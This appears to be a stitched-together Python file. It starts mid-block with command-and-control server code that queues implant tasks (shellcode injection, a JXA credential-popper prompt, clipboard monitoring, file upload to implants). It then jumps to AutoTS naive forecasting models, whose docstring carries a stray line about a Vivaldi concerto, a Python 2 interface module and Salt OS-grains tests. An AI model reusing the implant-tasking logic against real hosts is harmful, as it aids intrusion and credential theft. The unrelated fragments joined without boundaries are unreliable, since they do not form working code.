if RandomURI in path and tasks:
for task in tasks:
command = task[2]
user = task[3]
user_command = command
implant = DB.get_implantbyrandomuri(RandomURI)
implant_type = DB.get_implanttype(RandomURI)
now = datetime.datetime.now()
if (command.lower().startswith("$shellcode64")) or (command.lower().startswith("$shellcode86") or command.lower().startswith("run-exe core.program core inject-shellcode") or command.lower().startswith("run-exe pbind pbind run-exe core.program core inject-shellcode") or command.lower().startswith("pbind-command run-exe core.program core inject-shellcode") or command.lower().startswith("pbind-pivot-command run-exe core.program core inject-shellcode")):
user_command = "Inject Shellcode: %s" % command[command.index("#") + 1:]
command = command[:command.index("#")]
elif (command.lower().startswith("run-jxa ")) or (command.lower().startswith("clipboard-monitor ")) or (command.lower().startswith("cred-popper ")):
user_command = command[:command.index("#")]
command = "run-jxa " + command[command.index("#") + 1:]
elif (command.lower().startswith('upload-file') or command.lower().startswith('pbind-command upload-file') or command.lower().startswith('fcomm-command upload-file')):
PBind = False
FComm = False
if command.lower().startswith('pbind-command upload-file'):
PBind = True
if command.lower().startswith('fcomm-command upload-file'):
FComm = True
upload_args = command \
.replace('pbind-command upload-file', '') \
.replace('fcomm-command upload-file', '') \
.replace('upload-file', '')
upload_file_args_split = upload_args.split()
if len(upload_file_args_split) < 2:
print(Colours.RED)
print("Error parsing upload command: %s" % upload_args)
print(Colours.GREEN)
continue
upload_file = upload_file_args_split[0]
upload_file_destination = upload_file_args_split[1]
upload_args = upload_args.replace(upload_file, '')
upload_args = upload_args.replace(upload_file_destination, '')
with open(upload_file, "rb") as f:
upload_file_bytes = f.read()
if not upload_file_bytes:
print(Colours.RED + f"Error, no bytes read from the upload file, removing task: {upload_file}" + Colours.GREEN)
DB.del_newtasks(str(task[0]))
continue
upload_file_bytes_b64 = base64.b64encode(upload_file_bytes).decode("utf-8")
"""
Naives and Others Requiring No Additional Packages Beyond Numpy and Pandas
"""
from math import ceil
import warnings
import random
import datetime
import numpy as np
import pandas as pd
from autots.models.base import ModelObject, PredictionObject
from autots.tools import seasonal_int
from autots.tools.probabilistic import Point_to_Probability, historic_quantile
# optional requirement
try:
from scipy.spatial.distance import cdist
except Exception:
pass
class ZeroesNaive(ModelObject):
"""Naive forecasting predicting a dataframe of zeroes (0's)
Args:
name (str): String to identify class
frequency (str): String alias of datetime index frequency or else 'infer'
prediction_interval (float): Confidence interval for probabilistic forecast
"""
def __init__(
self,
name: str = "ZeroesNaive",
frequency: str = 'infer',
prediction_interval: float = 0.9,
holiday_country: str = 'US',
random_seed: int = 2020,
verbose: int = 0,
**kwargs
):
ModelObject.__init__(
self,
name,
frequency,
prediction_interval,
holiday_country=holiday_country,
random_seed=random_seed,
verbose=verbose,
)
def fit(self, df, future_regressor=None):
"""Train algorithm given data supplied
Args:
df (pandas.DataFrame): Datetime Indexed
"""
df = self.basic_profile(df)
self.fit_runtime = datetime.datetime.now() - self.startTime
return self
def predict(
self, forecast_length: int, future_regressor=None, just_point_forecast=False
):
"""Generates forecast data immediately following dates of index supplied to .fit()
Args:
forecast_length (int): Number of periods of data to forecast ahead
regressor (numpy.Array): additional regressor, not used
just_point_forecast (bool): If True, return a pandas.DataFrame of just point forecasts
Returns:
Either a PredictionObject of forecasts and metadata, or
if just_point_forecast == True, a dataframe of point forecasts
"""
predictStartTime = datetime.datetime.now()
df = pd.DataFrame(
np.zeros((forecast_length, (self.train_shape[1]))),
columns=self.column_names,
index=self.create_forecast_index(forecast_length=forecast_length),
)
if just_point_forecast:
return df
else:
predict_runtime = datetime.datetime.now() - predictStartTime
prediction = PredictionObject(
model_name=self.name,
forecast_length=forecast_length,
forecast_index=df.index,
forecast_columns=df.columns,
lower_forecast=df,
forecast=df,
upper_forecast=df,
prediction_interval=self.prediction_interval,
predict_runtime=predict_runtime,
fit_runtime=self.fit_runtime,
model_parameters=self.get_params(),
)
return prediction
def get_new_params(self, method: str = 'random'):
"""Returns dict of new parameters for parameter tuning"""
return {}
def get_params(self):
"""Return dict of current parameters"""
return {}
class LastValueNaive(ModelObject):
"""Naive forecasting predicting a dataframe of the last series value
Args:
name (str): String to identify class
frequency (str): String alias of datetime index frequency or else 'infer'
prediction_interval (float): Confidence interval for probabilistic forecast
"""
def __init__(
self,
name: str = "LastValueNaive",
frequency: str = 'infer',
prediction_interval: float = 0.9,
holiday_country: str = 'US',
random_seed: int = 2020,
**kwargs
):
ModelObject.__init__(
self,
name,
frequency,
prediction_interval,
holiday_country=holiday_country,
random_seed=random_seed,
)
def fit(self, df, future_regressor=None):
"""Train algorithm given data supplied
Args:
df (pandas.DataFrame): Datetime Indexed
"""
df = self.basic_profile(df)
self.last_values = df.tail(1).to_numpy()
# self.df_train = df
self.lower, self.upper = historic_quantile(
df, prediction_interval=self.prediction_interval
)
self.fit_runtime = datetime.datetime.now() - self.startTime
return self
def predict(
self, forecast_length: int, future_regressor=None, just_point_forecast=False
):
"""Generates forecast data immediately following dates of index supplied to .fit()
Args:
forecast_length (int): Number of periods of data to forecast ahead
regressor (numpy.Array): additional regressor, not used
just_point_forecast (bool): If True, return a pandas.DataFrame of just point forecasts
Returns:
Either a PredictionObject of forecasts and metadata, or
if just_point_forecast == True, a dataframe of point forecasts
"""
predictStartTime = datetime.datetime.now()
df = pd.DataFrame(
np.tile(self.last_values, (forecast_length, 1)),
columns=self.column_names,
index=self.create_forecast_index(forecast_length=forecast_length),
)
if just_point_forecast:
return df
else:
# upper_forecast, lower_forecast = Point_to_Probability(self.df_train, df, prediction_interval = self.prediction_interval, method = 'historic_quantile')
upper_forecast = df.astype(float) + (self.upper * 0.8)
lower_forecast = df.astype(float) - (self.lower * 0.8)
predict_runtime = datetime.datetime.now() - predictStartTime
prediction = PredictionObject(
model_name=self.name,
forecast_length=forecast_length,
forecast_index=df.index,
forecast_columns=df.columns,
lower_forecast=lower_forecast,
forecast=df,
upper_forecast=upper_forecast,
prediction_interval=self.prediction_interval,
predict_runtime=predict_runtime,
fit_runtime=self.fit_runtime,
model_parameters=self.get_params(),
)
return prediction
def get_new_params(self, method: str = 'random'):
"""Returns dict of new parameters for parameter tuning"""
return {}
def get_params(self):
"""Return dict of current parameters"""
return {}
class AverageValueNaive(ModelObject):
"""Naive forecasting predicting a dataframe of the series' median values
Args:
name (str): String to identify class
frequency (str): String alias of datetime index frequency or else 'infer'
prediction_interval (float): Confidence interval for probabilistic forecast
"""
def __init__(
self,
name: str = "AverageValueNaive",
frequency: str = 'infer',
prediction_interval: float = 0.9,
holiday_country: str = 'US',
random_seed: int = 2020,
verbose: int = 0,
method: str = 'Median',
**kwargs
):
ModelObject.__init__(
self,
name,
frequency,
prediction_interval,
holiday_country=holiday_country,
random_seed=random_seed,
verbose=verbose,
)
self.method = method
def fit(self, df, future_regressor=None):
"""Train algorithm given data supplied.
Args:
df (pandas.DataFrame): Datetime Indexed
"""
df = self.basic_profile(df)
method = str(self.method).lower()
if method == 'median':
self.average_values = df.median(axis=0).to_numpy()
elif method == 'mean':
self.average_values = df.mean(axis=0).to_numpy()
elif method == 'mode':
self.average_values = (
df.mode(axis=0).iloc[0].fillna(df.median(axis=0)).to_numpy()
)
elif method == "midhinge":
results = df.to_numpy()
q1 = np.nanquantile(results, q=0.25, axis=0)
q2 = np.nanquantile(results, q=0.75, axis=0)
self.average_values = (q1 + q2) / 2
elif method in ["weighted_mean", "exp_weighted_mean"]:
weights = pd.to_numeric(df.index)
weights = weights - weights.min()
if method == "exp_weighted_mean":
weights = (weights / weights[weights != 0].min()) ** 2
self.average_values = np.average(df.to_numpy(), axis=0, weights=weights)
self.fit_runtime = datetime.datetime.now() - self.startTime
self.lower, self.upper = historic_quantile(
df, prediction_interval=self.prediction_interval
)
return self
def predict(
self, forecast_length: int, future_regressor=None, just_point_forecast=False
):
"""Generates forecast data immediately following dates of index supplied to .fit()
Args:
forecast_length (int): Number of periods of data to forecast ahead
regressor (numpy.Array): additional regressor, not used
just_point_forecast (bool): If True, return a pandas.DataFrame of just point forecasts
Returns:
Either a PredictionObject of forecasts and metadata, or
if just_point_forecast == True, a dataframe of point forecasts
"""
predictStartTime = datetime.datetime.now()
df = pd.DataFrame(
np.tile(self.average_values, (forecast_length, 1)),
columns=self.column_names,
index=self.create_forecast_index(forecast_length=forecast_length),
)
if just_point_forecast:
return df
else:
upper_forecast = df.astype(float) + self.upper
lower_forecast = df.astype(float) - self.lower
predict_runtime = datetime.datetime.now() - predictStartTime
prediction = PredictionObject(
model_name=self.name,
forecast_length=forecast_length,
forecast_index=df.index,
forecast_columns=df.columns,
lower_forecast=lower_forecast,
forecast=df,
upper_forecast=upper_forecast,
prediction_interval=self.prediction_interval,
predict_runtime=predict_runtime,
fit_runtime=self.fit_runtime,
model_parameters=self.get_params(),
)
return prediction
def get_new_params(self, method: str = 'random'):
"""Returns dict of new parameters for parameter tuning"""
method_choice = random.choices(
[
"Mean",
"Median",
"Mode",
"Midhinge",
"Weighted_Mean",
"Exp_Weighted_Mean",
],
[0.3, 0.3, 0.01, 0.1, 0.4, 0.1],
)[0]
return {'method': method_choice}
def get_params(self):
"""Return dict of current parameters."""
return {'method': self.method}
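# --- Illustrative usage sketch (assumptions: a daily DatetimeIndex and the ModelObject /
# PredictionObject plumbing imported above behaving as documented; not from the original file):
# df = pd.DataFrame(
#     {"series_a": range(30)},
#     index=pd.date_range("2021-01-01", periods=30, freq="D"),
# )
# model = AverageValueNaive(method="Midhinge").fit(df)
# prediction = model.predict(forecast_length=7)
# point_forecast = prediction.forecast   # 7 rows, one column per input series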
class SeasonalNaive(ModelObject):
"""Naive forecasting predicting a dataframe with seasonal (lag) forecasts.
Concerto No. 2 in G minor, Op. 8, RV 315
Args:
name (str): String to identify class
frequency (str): String alias of datetime index frequency or else 'infer'
prediction_interval (float): Confidence interval for probabilistic forecast
method (str): Either 'LastValue' (use last value of lag n) or 'Mean' (avg of all lag n)
        lag_1 (int): The lag of the seasonality, should be an int > 1.
lag_2 (int): Optional second lag of seasonality which is averaged with first lag to produce forecast.
"""
def __init__(
self,
name: str = "SeasonalNaive",
frequency: str = 'infer',
prediction_interval: float = 0.9,
holiday_country: str = 'US',
random_seed: int = 2020,
verbose: int = 0,
lag_1: int = 7,
lag_2: int = None,
method: str = 'LastValue',
**kwargs
):
ModelObject.__init__(
self,
name,
frequency,
prediction_interval,
holiday_country=holiday_country,
random_seed=random_seed,
verbose=verbose,
)
self.lag_1 = abs(int(lag_1))
self.lag_2 = lag_2
if str(self.lag_2).isdigit():
self.lag_2 = abs(int(self.lag_2))
if str(self.lag_2) == str(self.lag_1):
self.lag_2 = 1
self.method = method
def fit(self, df, future_regressor=None):
"""Train algorithm given data supplied.
Args:
df (pandas.DataFrame): Datetime Indexed
"""
df = self.basic_profile(df)
self.df_train = df
df_length = self.train_shape[0]
self.tile_values_lag_2 = None
if self.method in ['Mean', 'Median']:
tile_index = np.tile(
np.arange(self.lag_1), int(np.ceil(df_length / self.lag_1))
)
tile_index = tile_index[len(tile_index) - (df_length) :]
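            # Worked example: with lag_1 = 7 and df_length = 10, np.tile(np.arange(7), 2)
            # gives [0,1,2,3,4,5,6,0,1,2,3,4,5,6]; keeping the last 10 entries yields
            # [4,5,6,0,1,2,3,4,5,6], so every row is labelled by its position in the
            # weekly cycle before the groupby aggregation below.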
df.index = tile_index
if self.method == "Median":
self.tile_values_lag_1 = df.groupby(level=0, axis=0).median()
else:
self.tile_values_lag_1 = df.groupby(level=0, axis=0).mean()
if str(self.lag_2).isdigit():
if self.lag_2 == 1:
self.tile_values_lag_2 = df.tail(self.lag_2)
else:
tile_index = np.tile(
np.arange(self.lag_2), int(np.ceil(df_length / self.lag_2))
)
tile_index = tile_index[len(tile_index) - (df_length) :]
df.index = tile_index
if self.method == "Median":
self.tile_values_lag_2 = df.groupby(level=0, axis=0).median()
else:
self.tile_values_lag_2 = df.groupby(level=0, axis=0).mean()
else:
            self.method = 'LastValue'  # fall back to LastValue for any unrecognized method
self.tile_values_lag_1 = df.tail(self.lag_1)
if str(self.lag_2).isdigit():
self.tile_values_lag_2 = df.tail(self.lag_2)
self.fit_runtime = datetime.datetime.now() - self.startTime
return self
def predict(
self,
forecast_length: int,
future_regressor=None,
just_point_forecast: bool = False,
):
"""Generate forecast data immediately following dates of .fit().
Args:
forecast_length (int): Number of periods of data to forecast ahead
regressor (numpy.Array): additional regressor, not used
just_point_forecast (bool): If True, return a pandas.DataFrame of just point forecasts
Returns:
Either a PredictionObject of forecasts and metadata, or
if just_point_forecast == True, a dataframe of point forecasts
"""
predictStartTime = datetime.datetime.now()
tile_len = len(self.tile_values_lag_1.index)
df = pd.DataFrame(
np.tile(
self.tile_values_lag_1, (int(np.ceil(forecast_length / tile_len)), 1)
)[0:forecast_length],
columns=self.column_names,
index=self.create_forecast_index(forecast_length=forecast_length),
)
if str(self.lag_2).isdigit():
y = pd.DataFrame(
np.tile(
self.tile_values_lag_2,
(
int(
np.ceil(forecast_length / len(self.tile_values_lag_2.index))
),
1,
),
)[0:forecast_length],
columns=self.column_names,
index=self.create_forecast_index(forecast_length=forecast_length),
)
            df = (df + y) / 2  # average the two seasonal lags, as described in the class docstring
#=======================================================================
__version__ = '''0.2.37'''
__sub_version__ = '''20071006153421'''
__copyright__ = '''(c) <NAME> 2003'''
#-----------------------------------------------------------------------
__doc__ = '''\
This module defines an interface definition and enforcement mechanism and
classes.
'''
#-----------------------------------------------------------------------
import inspect
import types
import sys
import pli.functional as func
import pli.logictypes as logictypes
import pli.pattern.mixin.mapping as mapping
#-----------------------------------------------------------------------
# TODO make it possible to change the __implements__ attr name...
# TODO write an InterfaceUnion class.... (e.g. an interface composed of
# several interfaces, that will support the "interface" interface)
#
#
#------------------------------------------------------InterfaceError---
# TODO docs!!
class InterfaceError(Exception):
'''
'''
pass
#-----------------------------------------------------------------------
#-----------------------------------------------------_BasicInterface---
class _BasicInterface(type, mapping.Mapping):
'''
the interface metaclass.
this defines the basic functionality:
- dict-like class interface.
- 'LIKE' special prop handling.
'''
# this will define the interface format...
__format__ = None
# this if False will prevent the modification of the interface
# after it's definition... (default: False)
__interface_writable__ = False
# this if True will enable element deletion from base interfaces if
# it was not defined locally... (default: False)
__contagious_delete__ = False
# WARNING: do not change this unless you know what you are doing!
__attribute_properties__ = (
# special options...
'LIKE',
)
def __init__(cls, name, bases, ns):
'''
'''
# sanity checks....
if not hasattr(cls, '__format__'):
raise InterfaceError, 'interface %s does not have a format defined.' % cls
# check consistency...
errs = []
if not cls.__isconsistent__(errs):
errs[:] = dict.fromkeys([ e.__class__.__name__ + ': '+ str(e) for e in errs ]).keys()
raise InterfaceError, 'inconsistent interface definition for %s in:\n %s.' % (cls, '\n '.join(errs))
super(_BasicInterface, cls).__init__(name, bases, ns)
# mapping specific:
def __getitem__(cls, name):
'''
'''
try:
return cls.getattrproperty(name)
except TypeError:
## ##!! is this needed???
## try:
## return super(_BasicInterface, cls).__getitem__(name)
## except:
## raise KeyError, str(name)
raise KeyError, str(name)
def __setitem__(cls, name, value):
'''
NOTE: this will only modify the current class (no base interface will change).
'''
if hasattr(cls, '__interface_writable__') and not cls.__interface_writable__:
raise InterfaceError, 'the interface %s is not modifiable.' % cls
if value == None and cls._isdependedon(name):
raise InterfaceError, 'can\'t shadow attr %s due to "LIKE" dependencies.' % name
if '__format__' in cls.__dict__ and cls.__format__ != None:
cls.__format__[name] = value
return
cls.__format__ = {name: value}
def __delitem__(cls, name):
'''
'''
if hasattr(cls, '__interface_writable__') and not cls.__interface_writable__:
raise InterfaceError, 'the interface %s is not modifiable.' % cls
if name in cls:
# if name is not local to this interface...
if ('__format__' not in cls.__dict__ or name not in cls.__dict__['__format__']) \
and (not hasattr(cls, '__contagious_delete__') or not cls.__contagious_delete__):
raise InterfaceError, 'the interface %s is not modifiable.' % cls
#
if cls._isdependedon(name):
raise InterfaceError, 'can\'t remove attr %s due to "LIKE" dependencies.' % name
# delete...
# this is safe as-is as we get here in two cases:
# 1. the name is local
# 2. we can delete the name form its container...
try:
del cls.__format__[name]
except KeyError:
for c in cls.__mro__[1:]:
if hasattr(c, '__format__') \
and c.__format__ != None \
and name in c.__format__:
if hasattr(c, '__interface_writable__') and not c.__interface_writable__:
raise InterfaceError, 'the interface %s is not modifiable.' % c
del c.__format__[name]
return
else:
raise KeyError, str(name)
def __contains__(cls, name):
'''
'''
try:
if cls._getrealprops(name) == None:
return False
return True
except:
## ##!! is this needed???
## try:
## return super(_BasicInterface, cls).__contains__(name)
## except:
## raise KeyError, str(name)
return False
def __iter__(cls):
'''
'''
visited = []
for c in cls.__mro__:
if hasattr(c, '__format__') \
and c.__format__ != None:
for k, v in c.__format__.iteritems():
# ignore visited or hidden items...
if k in visited:
continue
if v == None:
visited += [k]
continue
visited += [k]
yield k
# interface specific (1st generation):
def __isconsistent__(cls, errors=None):
'''
'''
err = None
if errors != None:
err = []
allowed_props = cls.__attribute_properties__
for name in cls:
try:
props = cls.getattrproperty(name)
for n in props:
if n not in allowed_props:
raise InterfaceError, 'unknown option "%s".' % n
except KeyError, e:
if cls._getrealprops(name) != None:
if err != None:
err += [e]
else:
return False
except Exception, e:
if err != None:
err += [e]
else:
return False
if err in ([], None):
return True
errors.extend(err)
return False
def _isdependedon(cls, name):
'''
        this will return True if the name occurs only once (and is not None) and at least
        one "LIKE" prop points at it.
        NOTE: the result this returns is relative to the first occurrence of name.
'''
lst = list(cls._realpropiter(name))
# check if we have a LIKE prop depending on this name...
if name in cls and len([ i for i in lst if i != None ]) < 2:
if len(lst) > 1 and lst[0] == None:
return False
# we need to search... (this might be slow!)
for c in cls.__mro__:
try:
for d in c.__format__.itervalues():
## if d != None and 'LIKE' in d and d['LIKE'] == name:
if d != None and d.get('LIKE', None) == name:
return True
except AttributeError:
pass
return False
def _realpropiter(cls, name):
'''
'''
if not hasattr(cls, '__format__'):
raise InterfaceError, 'interface %s does not have a format defined.' % cls
format = cls.__format__
for c in cls.__mro__:
## ##!!! REVISE: BEGIN TUKAN HACK
## # XXX We should go by mro to object, or try to stop earlier?
## if type(c) == type:
## return
## ##!!! we do not know anthing about like on this level...
## ##raise InterfaceError, 'LIKE argument "%s" is not found in the interface' % (name)
## ##!!! REVISE: END TUKAN HACK
if hasattr(c, '__format__') \
and c.__format__ != None \
and name in c.__format__:
##!!! process the 'LIKE' option...
yield c.__format__[name]
def _getrealprops(cls, name):
'''
this will return the real option dict for the attr (as defined in the __format__).
        NOTE: if the attr is not defined in the current class it will be searched for in the mro.
'''
try:
return cls._realpropiter(name).next()
except StopIteration:
raise KeyError, name
def getattrproperty(cls, name, prop=None):
'''
returns:
None : if prop is given but not found.
val : if prop is given and found (might also be None).
dict : if name is found and prop not given.
NOTE: if a property is not defined for the attr None will be
returned (this is the same as if its value was None).
'''
##!! REVISE !!##
allowed_props = cls.__attribute_properties__ + (None,)
if prop not in allowed_props:
raise InterfaceError, 'unknown option "%s".' % prop
if name not in cls:
if '*' in cls and cls['*'] != None:
res = {}
else:
raise KeyError, name
else:
res = cls._getrealprops(name)
res = res.copy()
# resolve the 'LIKE' prop...
visited = [res]
##!!! WRITTEN BY 2kan (2kan)
we_was_in___this_var_was_writtern_by_2kan__thus_I_have_no_idea_what_it_means____RANAME_AS_SOON_AS_POSSIBLE_TO_FIGURE_OUT_THE_ACTUAL_SEMANTICS \
= None
while 'LIKE' in res:
if type(res['LIKE']) is str:
## ext_format = cls._getrealprops(res['LIKE']).copy()
for fmt in cls._realpropiter(res['LIKE']):
if fmt != None:
ext_format = fmt.copy()
break
elif type(res['LIKE']) is dict:
ext_format = res['LIKE'].copy()
else:
raise TypeError, 'the argument of "LIKE" attribute option must '\
'either be of type str or dict (got: %s).' % type(res['LIKE'])
## if res['LIKE'] == name or ext_format in visited:
##!!! WRITTEN BY 2kan (+11)
if res['LIKE'] == name or \
res['LIKE'] == we_was_in___this_var_was_writtern_by_2kan__thus_I_have_no_idea_what_it_means____RANAME_AS_SOON_AS_POSSIBLE_TO_FIGURE_OUT_THE_ACTUAL_SEMANTICS:
temp = 1
for fmt in cls._realpropiter(res['LIKE']):
# NOTE: We always need to do one iteration to go to
# the upper level in mro.
if temp == 1:
temp = 0
continue
if fmt != None:
ext_format = fmt.copy()
break
if ext_format in visited:
# check for conflicts in the chain.... (a conflict is
# when a name is present more than once with different
# values).
v = visited[0]
# XXX is there a better way to do this??? (use sets???)
for d in visited[1:]:
for k in d:
if k != 'LIKE' and k in v and d[k] != v[k]:
raise InterfaceError, 'LIKE loop conflict in %s for attribute "%s".' % (cls, name)
if k not in allowed_props:
raise InterfaceError, 'unknown option "%s".' % k
v[k] = d[k]
del res['LIKE']
break
we_was_in___this_var_was_writtern_by_2kan__thus_I_have_no_idea_what_it_means____RANAME_AS_SOON_AS_POSSIBLE_TO_FIGURE_OUT_THE_ACTUAL_SEMANTICS \
= res['LIKE']
visited += [ext_format.copy()]
del res['LIKE']
ext_format.update(res)
# revise...
## res = ext_format
res.update(ext_format)
if prop != None:
if prop in res:
return res[prop]
else:
## raise InterfaceError, 'property "%s" is not defined for attr "%s".' % (prop, name)
return None
return res
#----------------------------------------------------------_Interface---
# TODO docs!!
class _Interface(_BasicInterface):
'''
'''
# WARNING: do not change this unless you know what you are doing!
__attribute_properties__ = _BasicInterface.__attribute_properties__ + (
'type',
'default',
'predicate',
'essential',
'doc',
'handler',
'readable',
'writable',
'deleteable',
)
# interface methods (2nd generation):
# TODO exception safe??????
def isessential(cls, name):
'''
'''
return cls.getattrproperty(name, 'essential') == True
def isreadable(cls, name):
'''
'''
return cls.getattrproperty(name, 'readable') in (True, None)
def iswritable(cls, name):
'''
'''
return cls.getattrproperty(name, 'writable') in (True, None)
def isdeletable(cls, name):
'''
'''
return cls.getattrproperty(name, 'deleteable') in (True, None) \
and cls.getattrproperty(name, 'essential') != True
#-----------------------------------------------------------Interface---
# Q: how wil the user based ACL be added??
class Interface(object):
'''
this is the basic interface class.
this provides a basic mechanism to define object attribute format.
    NOTE: this only provides means to define attribute format, as
methods are also attributes they can be checked using the
predicate mechanism.
NOTE: if the value of the attr key is None, the attr will be
invisible.
the attribute definition format is as follows:
{
<attr-name> :
{
<opt-name>: <opt-value>
[...]
}
[...]
}
supported options:
type - value type or superclass.
default - this is the default value of the option.
predicate - this will get the option value as argument and
test its compliance (if this will return False
InterfaceError will be raised).
essential - this if true will guarantee the options'
existence in the created object.
doc - this is the attr documentation
handler - this is the alternative attribute handler.
this will take the object, attr name and attr
value as arguments and its' return will replace
the original value.
NOTE: if the 'default' option is set it WILL get
filtered through the handler.
NOTE: this can be called when the object is not
fully initialized, thus no assumptions about
object state should be made.
for instance this will happen for
pli.interface.objects.ObjectWithInterface if
both the handler and the default value are
defined.
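# --- Illustrative sketch (not from the original module): an attribute-format dictionary
# of the shape described in the Interface docstring above. Attribute names and option
# values are made up; 'LIKE' reuses another attribute's options as handled by
# _BasicInterface.getattrproperty.
# example_format = {
#     'name': {
#         'type': str,
#         'essential': True,
#         'doc': 'human-readable object name',
#     },
#     'nickname': {
#         'LIKE': 'name',       # inherit the options defined for 'name'
#         'essential': False,
#     },
#     'internal_id': None,      # a None value hides the attribute
# }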
Server 12 SP1',
'ID': 'sles',
'ANSI_COLOR': '0;32',
'CPE_NAME': 'cpe:/o:suse:sles:12:sp1'
},
}
expectation = {
'oscodename': 'SUSE Linux Enterprise Server 12 SP1',
'osfullname': "SLES",
'osrelease': '12.1',
'osrelease_info': (12, 1),
'osmajorrelease': 12,
'osfinger': 'SLES-12',
}
self._run_suse_os_grains_tests(_os_release_map, expectation)
@skipIf(not salt.utils.platform.is_linux(), 'System is not Linux')
def test_suse_os_grains_opensuse_leap_42_1(self):
'''
Test if OS grains are parsed correctly in openSUSE Leap 42.1
'''
_os_release_map = {
'os_release_file': {
'NAME': 'openSUSE Leap',
'VERSION': '42.1',
'VERSION_ID': '42.1',
'PRETTY_NAME': 'openSUSE Leap 42.1 (x86_64)',
'ID': 'opensuse',
'ANSI_COLOR': '0;32',
'CPE_NAME': 'cpe:/o:opensuse:opensuse:42.1'
},
}
expectation = {
'oscodename': 'openSUSE Leap 42.1 (x86_64)',
'osfullname': "Leap",
'osrelease': '42.1',
'osrelease_info': (42, 1),
'osmajorrelease': 42,
'osfinger': 'Leap-42',
}
self._run_suse_os_grains_tests(_os_release_map, expectation)
@skipIf(not salt.utils.platform.is_linux(), 'System is not Linux')
def test_suse_os_grains_tumbleweed(self):
'''
Test if OS grains are parsed correctly in openSUSE Tumbleweed
'''
_os_release_map = {
'os_release_file': {
'NAME': 'openSUSE',
'VERSION': 'Tumbleweed',
'VERSION_ID': '20160504',
'PRETTY_NAME': 'openSUSE Tumbleweed (20160504) (x86_64)',
'ID': 'opensuse',
'ANSI_COLOR': '0;32',
'CPE_NAME': 'cpe:/o:opensuse:opensuse:20160504'
},
}
expectation = {
'oscodename': 'openSUSE Tumbleweed (20160504) (x86_64)',
'osfullname': "Tumbleweed",
'osrelease': '20160504',
'osrelease_info': (20160504,),
'osmajorrelease': 20160504,
'osfinger': 'Tumbleweed-20160504',
}
self._run_suse_os_grains_tests(_os_release_map, expectation)
@skipIf(not salt.utils.platform.is_linux(), 'System is not Linux')
def test_debian_7_os_grains(self):
'''
Test if OS grains are parsed correctly in Debian 7 "wheezy"
'''
_os_release_map = {
'linux_distribution': ('debian', '7.11', ''),
}
expectation = {
'os': 'Debian',
'os_family': 'Debian',
'oscodename': 'wheezy',
'osfullname': 'Debian GNU/Linux',
'osrelease': '7',
'osrelease_info': (7,),
'osmajorrelease': 7,
'osfinger': 'Debian-7',
}
self._run_os_grains_tests("debian-7", _os_release_map, expectation)
@skipIf(not salt.utils.platform.is_linux(), 'System is not Linux')
def test_debian_8_os_grains(self):
'''
Test if OS grains are parsed correctly in Debian 8 "jessie"
'''
_os_release_map = {
'linux_distribution': ('debian', '8.10', ''),
}
expectation = {
'os': 'Debian',
'os_family': 'Debian',
'oscodename': 'jessie',
'osfullname': 'Debian GNU/Linux',
'osrelease': '8',
'osrelease_info': (8,),
'osmajorrelease': 8,
'osfinger': 'Debian-8',
}
self._run_os_grains_tests("debian-8", _os_release_map, expectation)
@skipIf(not salt.utils.platform.is_linux(), 'System is not Linux')
def test_debian_9_os_grains(self):
'''
Test if OS grains are parsed correctly in Debian 9 "stretch"
'''
_os_release_map = {
'linux_distribution': ('debian', '9.3', ''),
}
expectation = {
'os': 'Debian',
'os_family': 'Debian',
'oscodename': 'stretch',
'osfullname': 'Debian GNU/Linux',
'osrelease': '9',
'osrelease_info': (9,),
'osmajorrelease': 9,
'osfinger': 'Debian-9',
}
self._run_os_grains_tests("debian-9", _os_release_map, expectation)
@skipIf(not salt.utils.platform.is_linux(), 'System is not Linux')
def test_ubuntu_xenial_os_grains(self):
'''
Test if OS grains are parsed correctly in Ubuntu 16.04 "Xenial Xerus"
'''
_os_release_map = {
'linux_distribution': ('Ubuntu', '16.04', 'xenial'),
}
expectation = {
'os': 'Ubuntu',
'os_family': 'Debian',
'oscodename': 'xenial',
'osfullname': 'Ubuntu',
'osrelease': '16.04',
'osrelease_info': (16, 4),
'osmajorrelease': 16,
'osfinger': 'Ubuntu-16.04',
}
self._run_os_grains_tests("ubuntu-16.04", _os_release_map, expectation)
@skipIf(not salt.utils.platform.is_linux(), 'System is not Linux')
def test_ubuntu_artful_os_grains(self):
'''
Test if OS grains are parsed correctly in Ubuntu 17.10 "<NAME>"
'''
_os_release_map = {
'linux_distribution': ('Ubuntu', '17.10', 'artful'),
}
expectation = {
'os': 'Ubuntu',
'os_family': 'Debian',
'oscodename': 'artful',
'osfullname': 'Ubuntu',
'osrelease': '17.10',
'osrelease_info': (17, 10),
'osmajorrelease': 17,
'osfinger': 'Ubuntu-17.10',
}
self._run_os_grains_tests("ubuntu-17.10", _os_release_map, expectation)
@skipIf(not salt.utils.platform.is_windows(), 'System is not Windows')
def test_windows_platform_data(self):
'''
Test the _windows_platform_data function
'''
grains = ['biosversion', 'kernelrelease', 'kernelversion',
'manufacturer', 'motherboard', 'osfullname', 'osmanufacturer',
'osrelease', 'osservicepack', 'osversion', 'productname',
'serialnumber', 'timezone', 'virtual', 'windowsdomain',
'windowsdomaintype']
returned_grains = core._windows_platform_data()
for grain in grains:
self.assertIn(grain, returned_grains)
valid_types = ['Unknown', 'Unjoined', 'Workgroup', 'Domain']
self.assertIn(returned_grains['windowsdomaintype'], valid_types)
valid_releases = ['Vista', '7', '8', '8.1', '10', '2008Server',
'2008ServerR2', '2012Server', '2012ServerR2',
'2016Server', '2019Server']
self.assertIn(returned_grains['osrelease'], valid_releases)
def test__windows_os_release_grain(self):
versions = {
'Windows 10 Home': '10',
'Windows 10 Pro': '10',
'Windows 10 Pro for Workstations': '10',
'Windows 10 Pro Education': '10',
'Windows 10 Enterprise': '10',
'Windows 10 Enterprise LTSB': '10',
'Windows 10 Education': '10',
'Windows 10 IoT Core': '10',
'Windows 10 IoT Enterprise': '10',
'Windows 10 S': '10',
'Windows 8.1': '8.1',
'Windows 8.1 Pro': '8.1',
'Windows 8.1 Enterprise': '8.1',
'Windows 8.1 OEM': '8.1',
'Windows 8.1 with Bing': '8.1',
'Windows 8': '8',
'Windows 8 Pro': '8',
'Windows 8 Enterprise': '8',
'Windows 8 OEM': '8',
'Windows 7 Starter': '7',
'Windows 7 Home Basic': '7',
'Windows 7 Home Premium': '7',
'Windows 7 Professional': '7',
'Windows 7 Enterprise': '7',
'Windows 7 Ultimate': '7',
'Windows Thin PC': 'Thin',
'Windows Vista Starter': 'Vista',
'Windows Vista Home Basic': 'Vista',
'Windows Vista Home Premium': 'Vista',
'Windows Vista Business': 'Vista',
'Windows Vista Enterprise': 'Vista',
'Windows Vista Ultimate': 'Vista',
'Windows Server 2019 Essentials': '2019Server',
'Windows Server 2019 Standard': '2019Server',
